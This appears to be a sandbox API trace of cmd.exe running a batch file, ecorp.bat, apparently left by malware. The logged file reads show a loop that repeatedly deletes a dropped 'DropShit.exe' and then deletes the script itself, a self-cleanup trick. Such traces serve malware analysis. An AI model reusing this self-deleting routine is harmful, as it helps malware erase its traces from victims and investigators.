returned 0x268a10 [0092.014] GetProcessHeap () returned 0x250000 [0092.014] RtlReAllocateHeap (Heap=0x250000, Flags=0x0, Ptr=0x268a10, Size=0x30) returned 0x268a10 [0092.014] GetProcessHeap () returned 0x250000 [0092.014] RtlSizeHeap (HeapHandle=0x250000, Flags=0x0, MemoryPointer=0x268a10) returned 0x30 [0092.014] GetProcessHeap () returned 0x250000 [0092.014] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0xb0) returned 0x26d0b0 [0092.014] GetProcessHeap () returned 0x250000 [0092.014] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x1a) returned 0x278f90 [0092.014] GetProcessHeap () returned 0x250000 [0092.014] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x20) returned 0x278fc0 [0092.014] _tell (_FileHandle=3) returned 66 [0092.014] _close (_FileHandle=3) returned 0 [0092.014] _vsnwprintf (in: _Buffer=0x4a9c6340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x14ecf8 | out: _Buffer="\r\n") returned 2 [0092.014] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.014] GetFileType (hFile=0x7) returned 0x2 [0092.015] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0092.015] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ec88 | out: lpMode=0x14ec88) returned 1 [0092.015] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.015] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9c6340*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x14ecc8, lpReserved=0x0 | out: lpBuffer=0x4a9c6340*, lpNumberOfCharsWritten=0x14ecc8*=0x2) returned 1 [0092.015] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9bc0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0092.015] _vsnwprintf (in: _Buffer=0x4a9aeb60, _BufferCount=0x3fe, _Format="%s", _ArgList=0x14ed08 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0092.016] _vsnwprintf (in: _Buffer=0x4a9aebaa, _BufferCount=0x3d9, _Format="%c", _ArgList=0x14ed08 | out: _Buffer=">") returned 1 [0092.016] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.016] GetFileType (hFile=0x7) returned 0x2 [0092.016] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0092.016] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ecb8 | out: lpMode=0x14ecb8) returned 1 [0092.016] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.016] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9aeb60*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x14ecf8, lpReserved=0x0 | out: lpBuffer=0x4a9aeb60*, lpNumberOfCharsWritten=0x14ecf8*=0x26) returned 1 [0092.016] _vsnwprintf (in: _Buffer=0x4a9c6340, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x14efd8 | out: _Buffer="if ") returned 3 [0092.016] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.016] GetFileType (hFile=0x7) returned 0x2 [0092.016] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0092.016] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ef68 | out: lpMode=0x14ef68) returned 1 [0092.017] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.017] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9c6340*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x14efa8, lpReserved=0x0 | out: lpBuffer=0x4a9c6340*, lpNumberOfCharsWritten=0x14efa8*=0x3) returned 1 [0092.017] _vsnwprintf (in: _Buffer=0x4a9c6340, _BufferCount=0x1fff, _Format="%s %s ", _ArgList=0x14efa8 | out: _Buffer="exist \"DropShit.exe\" ") returned 21 [0092.017] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.017] GetFileType (hFile=0x7) returned 0x2 [0092.017] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0092.017] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ef38 | out: lpMode=0x14ef38) returned 1 [0092.017] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.017] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9c6340*, nNumberOfCharsToWrite=0x15, lpNumberOfCharsWritten=0x14ef78, lpReserved=0x0 | out: lpBuffer=0x4a9c6340*, lpNumberOfCharsWritten=0x14ef78*=0x15) returned 1 [0092.017] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.018] GetFileType (hFile=0x7) returned 0x2 [0092.018] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0092.018] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ef68 | out: lpMode=0x14ef68) returned 1 [0092.018] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.018] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x278fa0*, nNumberOfCharsToWrite=0x4, lpNumberOfCharsWritten=0x14efa8, lpReserved=0x0 | out: lpBuffer=0x278fa0*, lpNumberOfCharsWritten=0x14efa8*=0x4) returned 1 [0092.018] _vsnwprintf (in: _Buffer=0x4a9c6340, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x14efa8 | out: _Buffer=" Repeat ") returned 8 [0092.018] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.018] GetFileType (hFile=0x7) returned 0x2 [0092.018] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0092.018] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ef38 | out: lpMode=0x14ef38) returned 1 [0092.019] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.019] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9c6340*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x14ef78, lpReserved=0x0 | out: lpBuffer=0x4a9c6340*, lpNumberOfCharsWritten=0x14ef78*=0x8) returned 1 [0092.019] _vsnwprintf (in: _Buffer=0x4a9c6340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x14efd8 | out: _Buffer="\r\n") returned 2 [0092.019] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.019] GetFileType (hFile=0x7) returned 0x2 [0092.019] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0092.019] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ef68 | out: lpMode=0x14ef68) returned 1 [0092.019] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.019] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9c6340*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x14efa8, lpReserved=0x0 | out: lpBuffer=0x4a9c6340*, lpNumberOfCharsWritten=0x14efa8*=0x2) returned 1 [0092.020] GetFullPathNameW (in: lpFileName="DropShit.exe", nBufferLength=0x208, lpBuffer=0x14eae0, lpFilePart=0x14e880 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DropShit.exe", lpFilePart=0x14e880*="DropShit.exe") returned 0x32 [0092.020] wcsncmp (_String1="C:\\U", _String2="\\\\.\\", _MaxCount=0x4) returned -25 [0092.020] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DropShit.exe", fInfoLevelId=0x1, lpFindFileData=0x14e890, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14e890) returned 0x268a50 [0092.020] FindClose (in: hFindFile=0x268a50 | out: hFindFile=0x268a50) returned 1 [0092.020] GetConsoleTitleW (in: lpConsoleTitle=0x14ec40, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0092.020] GetProcessHeap () returned 0x250000 [0092.020] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x30) returned 0x266aa0 [0092.020] GetProcessHeap () returned 0x250000 [0092.020] RtlReAllocateHeap (Heap=0x250000, Flags=0x0, Ptr=0x266aa0, Size=0x20) returned 0x278ff0 [0092.020] GetProcessHeap () returned 0x250000 [0092.020] RtlSizeHeap (HeapHandle=0x250000, Flags=0x0, MemoryPointer=0x278ff0) returned 0x20 [0092.020] GetProcessHeap () returned 0x250000 [0092.020] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x2a) returned 0x266aa0 [0092.020] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ecorp.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ecorp.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x14e6f8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c [0092.020] _open_osfhandle (_OSFileHandle=0x5c, _Flags=8) returned 3 [0092.020] _get_osfhandle (_FileHandle=3) returned 0x5c [0092.020] SetFilePointer (in: hFile=0x5c, lDistanceToMove=66, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x42 [0092.020] _get_osfhandle (_FileHandle=3) returned 0x5c [0092.020] GetFileSize (in: hFile=0x5c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x51 [0092.021] _get_osfhandle (_FileHandle=3) returned 0x5c [0092.021] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x42 [0092.021] _get_osfhandle (_FileHandle=3) returned 0x5c [0092.021] GetFileType (hFile=0x5c) returned 0x1 [0092.021] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x42 [0092.021] ReadFile (in: hFile=0x5c, lpBuffer=0x4a9bc320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e7b0, lpOverlapped=0x0 | out: lpBuffer=0x4a9bc320*, lpNumberOfBytesRead=0x14e7b0*=0xf, lpOverlapped=0x0) returned 1 [0092.021] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a9bc320, cbMultiByte=15, lpWideCharStr=0x4a9b7b60, cchWideChar=512 | out: lpWideCharStr="del ecorp.bat\r\n") returned 15 [0092.021] _get_osfhandle (_FileHandle=3) returned 0x5c [0092.021] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x51 [0092.021] _get_osfhandle (_FileHandle=3) returned 0x5c [0092.021] GetFileType (hFile=0x5c) returned 0x1 [0092.021] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x51 [0092.021] ReadFile (in: hFile=0x5c, lpBuffer=0x4a9bc320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e7b0, lpOverlapped=0x0 | out: lpBuffer=0x4a9bc320*, lpNumberOfBytesRead=0x14e7b0*=0x0, lpOverlapped=0x0) returned 1 [0092.021] _get_osfhandle (_FileHandle=3) returned 0x5c [0092.021] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.021] _get_osfhandle (_FileHandle=3) returned 0x5c [0092.021] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.021] _get_osfhandle (_FileHandle=3) returned 0x5c [0092.021] GetFileType (hFile=0x5c) returned 0x1 [0092.021] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.021] ReadFile (in: hFile=0x5c, lpBuffer=0x4a9bc320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e7b0, lpOverlapped=0x0 | out: lpBuffer=0x4a9bc320*, lpNumberOfBytesRead=0x14e7b0*=0x51, lpOverlapped=0x0) returned 1 [0092.021] SetFilePointer (in: hFile=0x5c, lDistanceToMove=9, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9 [0092.021] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a9bc320, cbMultiByte=9, lpWideCharStr=0x4a9b7b60, cchWideChar=512 | out: lpWideCharStr=":Repeat\r\n.bat\r\n") returned 9 [0092.021] _close (_FileHandle=3) returned 0 [0092.022] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.022] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0092.022] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.022] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9ae194 | out: lpMode=0x4a9ae194) returned 1 [0092.022] _get_osfhandle (_FileHandle=0) returned 0x3 [0092.022] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9ae198 | out: lpMode=0x4a9ae198) returned 1 [0092.022] SetConsoleInputExeNameW () returned 0x1 [0092.022] GetConsoleOutputCP () returned 0x1b5 [0092.022] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9bbfe0 | out: lpCPInfo=0x4a9bbfe0) returned 1 [0092.022] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0092.022] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ecorp.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ecorp.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x14ef58, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c [0092.022] _open_osfhandle (_OSFileHandle=0x5c, _Flags=8) returned 3 [0092.023] _get_osfhandle (_FileHandle=3) returned 0x5c [0092.023] SetFilePointer (in: hFile=0x5c, lDistanceToMove=9, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9 [0092.023] GetProcessHeap () returned 0x250000 [0092.023] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x266aa0 | out: hHeap=0x250000) returned 1 [0092.023] GetProcessHeap () returned 0x250000 [0092.023] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x278ff0 | out: hHeap=0x250000) returned 1 [0092.023] GetProcessHeap () returned 0x250000 [0092.023] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x278fc0 | out: hHeap=0x250000) returned 1 [0092.023] GetProcessHeap () returned 0x250000 [0092.023] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x278f90 | out: hHeap=0x250000) returned 1 [0092.023] GetProcessHeap () returned 0x250000 [0092.023] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26d0b0 | out: hHeap=0x250000) returned 1 [0092.023] GetProcessHeap () returned 0x250000 [0092.023] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x268a10 | out: hHeap=0x250000) returned 1 [0092.023] GetProcessHeap () returned 0x250000 [0092.023] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x266a60 | out: hHeap=0x250000) returned 1 [0092.023] GetProcessHeap () returned 0x250000 [0092.023] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x264610 | out: hHeap=0x250000) returned 1 [0092.023] GetProcessHeap () returned 0x250000 [0092.023] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26cff0 | out: hHeap=0x250000) returned 1 [0092.023] GetProcessHeap () returned 0x250000 [0092.023] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2645e0 | out: hHeap=0x250000) returned 1 [0092.023] GetProcessHeap () returned 0x250000 [0092.023] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x27a2f0 | out: hHeap=0x250000) returned 1 [0092.023] GetProcessHeap () returned 0x250000 [0092.023] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26cf30 | out: hHeap=0x250000) returned 1 [0092.023] _get_osfhandle (_FileHandle=3) returned 0x5c [0092.023] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9 [0092.023] ReadFile (in: hFile=0x5c, lpBuffer=0x4a9bc320, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x14ed60, lpOverlapped=0x0 | out: lpBuffer=0x4a9bc320*, lpNumberOfBytesRead=0x14ed60*=0x48, lpOverlapped=0x0) returned 1 [0092.023] SetFilePointer (in: hFile=0x5c, lDistanceToMove=29, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1d [0092.023] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a9bc320, cbMultiByte=20, lpWideCharStr=0x4a9be320, cchWideChar=8191 | out: lpWideCharStr="del \"DropShit.exe\"\r\nxe\" goto Repeat\r\n") returned 20 [0092.023] _get_osfhandle (_FileHandle=3) returned 0x5c [0092.023] GetFileType (hFile=0x5c) returned 0x1 [0092.023] _get_osfhandle (_FileHandle=3) returned 0x5c [0092.023] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1d [0092.024] GetProcessHeap () returned 0x250000 [0092.024] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x4012) returned 0x27c760 [0092.024] GetProcessHeap () returned 0x250000 [0092.024] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x27c760 | out: hHeap=0x250000) returned 1 [0092.024] GetProcessHeap () returned 0x250000 [0092.024] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0xb0) returned 0x26cf30 [0092.024] GetProcessHeap () returned 0x250000 [0092.024] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x18) returned 0x27a2f0 [0092.024] GetProcessHeap () returned 0x250000 [0092.024] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x30) returned 0x266a60 [0092.024] _tell (_FileHandle=3) returned 29 [0092.024] _close (_FileHandle=3) returned 0 [0092.024] _vsnwprintf (in: _Buffer=0x4a9c6340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x14ecf8 | out: _Buffer="\r\n") returned 2 [0092.024] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.024] GetFileType (hFile=0x7) returned 0x2 [0092.024] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0092.024] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ec88 | out: lpMode=0x14ec88) returned 1 [0092.025] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.025] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9c6340*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x14ecc8, lpReserved=0x0 | out: lpBuffer=0x4a9c6340*, lpNumberOfCharsWritten=0x14ecc8*=0x2) returned 1 [0092.025] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9bc0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0092.025] _vsnwprintf (in: _Buffer=0x4a9aeb60, _BufferCount=0x3fe, _Format="%s", _ArgList=0x14ed08 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0092.025] _vsnwprintf (in: _Buffer=0x4a9aebaa, _BufferCount=0x3d9, _Format="%c", _ArgList=0x14ed08 | out: _Buffer=">") returned 1 [0092.025] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.025] GetFileType (hFile=0x7) returned 0x2 [0092.025] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0092.025] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ecb8 | out: lpMode=0x14ecb8) returned 1 [0092.026] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.026] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9aeb60*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x14ecf8, lpReserved=0x0 | out: lpBuffer=0x4a9aeb60*, lpNumberOfCharsWritten=0x14ecf8*=0x26) returned 1 [0092.026] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.026] GetFileType (hFile=0x7) returned 0x2 [0092.026] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0092.026] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ef98 | out: lpMode=0x14ef98) returned 1 [0092.026] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.026] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x27a300*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x14efd8, lpReserved=0x0 | out: lpBuffer=0x27a300*, lpNumberOfCharsWritten=0x14efd8*=0x3) returned 1 [0092.026] _vsnwprintf (in: _Buffer=0x4a9c6340, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x14efd8 | out: _Buffer=" \"DropShit.exe\" ") returned 16 [0092.026] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.027] GetFileType (hFile=0x7) returned 0x2 [0092.027] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0092.027] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ef68 | out: lpMode=0x14ef68) returned 1 [0092.027] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.027] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9c6340*, nNumberOfCharsToWrite=0x10, lpNumberOfCharsWritten=0x14efa8, lpReserved=0x0 | out: lpBuffer=0x4a9c6340*, lpNumberOfCharsWritten=0x14efa8*=0x10) returned 1 [0092.027] _vsnwprintf (in: _Buffer=0x4a9c6340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x14efd8 | out: _Buffer="\r\n") returned 2 [0092.027] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.027] GetFileType (hFile=0x7) returned 0x2 [0092.027] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0092.027] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ef68 | out: lpMode=0x14ef68) returned 1 [0092.028] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.028] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9c6340*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x14efa8, lpReserved=0x0 | out: lpBuffer=0x4a9c6340*, lpNumberOfCharsWritten=0x14efa8*=0x2) returned 1 [0092.028] _wcsicmp (_String1="del", _String2="DIR") returned -4 [0092.028] _wcsicmp (_String1="del", _String2="ERASE") returned -1 [0092.028] _wcsicmp (_String1="del", _String2="DEL") returned 0 [0092.028] GetConsoleTitleW (in: lpConsoleTitle=0x14ed00, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0092.028] GetProcessHeap () returned 0x250000 [0092.028] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x50) returned 0x268a10 [0092.028] GetProcessHeap () returned 0x250000 [0092.028] RtlReAllocateHeap (Heap=0x250000, Flags=0x0, Ptr=0x268a10, Size=0x30) returned 0x268a10 [0092.028] GetProcessHeap () returned 0x250000 [0092.028] RtlSizeHeap (HeapHandle=0x250000, Flags=0x0, MemoryPointer=0x268a10) returned 0x30 [0092.028] GetProcessHeap () returned 0x250000 [0092.028] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x38) returned 0x266aa0 [0092.028] GetProcessHeap () returned 0x250000 [0092.028] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x50) returned 0x268a50 [0092.029] GetProcessHeap () returned 0x250000 [0092.029] RtlReAllocateHeap (Heap=0x250000, Flags=0x0, Ptr=0x268a50, Size=0x30) returned 0x268a50 [0092.029] GetProcessHeap () returned 0x250000 [0092.029] RtlSizeHeap (HeapHandle=0x250000, Flags=0x0, MemoryPointer=0x268a50) returned 0x30 [0092.029] GetProcessHeap () returned 0x250000 [0092.029] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x2a) returned 0x266ae0 [0092.029] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x14e860 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0092.029] GetProcessHeap () returned 0x250000 [0092.029] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x58) returned 0x268a90 [0092.029] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x14d770 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0092.029] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x14da28, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x14e280, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x14da28*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0092.029] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0092.029] GetProcessHeap () returned 0x250000 [0092.029] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x58) returned 0x26ccf0 [0092.029] GetProcessHeap () returned 0x250000 [0092.029] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x260) returned 0x2518c0 [0092.029] _wcsicmp (_String1="DropShit.exe", _String2=".") returned 54 [0092.029] _wcsicmp (_String1="DropShit.exe", _String2="..") returned 54 [0092.029] GetFileAttributesW (lpFileName="DropShit.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dropshit.exe")) returned 0x20 [0092.029] GetProcessHeap () returned 0x250000 [0092.029] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x218) returned 0x251b30 [0092.029] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x251b40 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0092.029] SetErrorMode (uMode=0x0) returned 0x0 [0092.029] SetErrorMode (uMode=0x1) returned 0x0 [0092.029] GetFullPathNameW (in: lpFileName="DropShit.exe", nBufferLength=0x104, lpBuffer=0x14d790, lpFilePart=0x14d780 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DropShit.exe", lpFilePart=0x14d780*="DropShit.exe") returned 0x32 [0092.029] SetErrorMode (uMode=0x0) returned 0x1 [0092.030] GetProcessHeap () returned 0x250000 [0092.030] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x260) returned 0x26ef00 [0092.030] _wcsicmp (_String1="DropShit.exe", _String2=".") returned 54 [0092.030] _wcsicmp (_String1="DropShit.exe", _String2="..") returned 54 [0092.030] GetFileAttributesW (lpFileName="DropShit.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dropshit.exe")) returned 0x20 [0092.030] GetProcessHeap () returned 0x250000 [0092.030] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x2a) returned 0x266b20 [0092.030] GetProcessHeap () returned 0x250000 [0092.030] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x5c) returned 0x26cd50 [0092.030] GetProcessHeap () returned 0x250000 [0092.030] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x5c) returned 0x26cdc0 [0092.030] GetProcessHeap () returned 0x250000 [0092.030] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x810) returned 0x26f170 [0092.030] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DropShit.exe", fInfoLevelId=0x0, lpFindFileData=0x26f184, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26f184) returned 0x251d50 [0092.030] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DropShit.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dropshit.exe")) returned 0 [0092.030] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DropShit.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dropshit.exe")) returned 0 [0092.030] GetLastError () returned 0x5 [0092.030] _vsnwprintf (in: _Buffer=0x4a9c6340, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x14dc38 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DropShit.exe\r\n") returned 52 [0092.030] 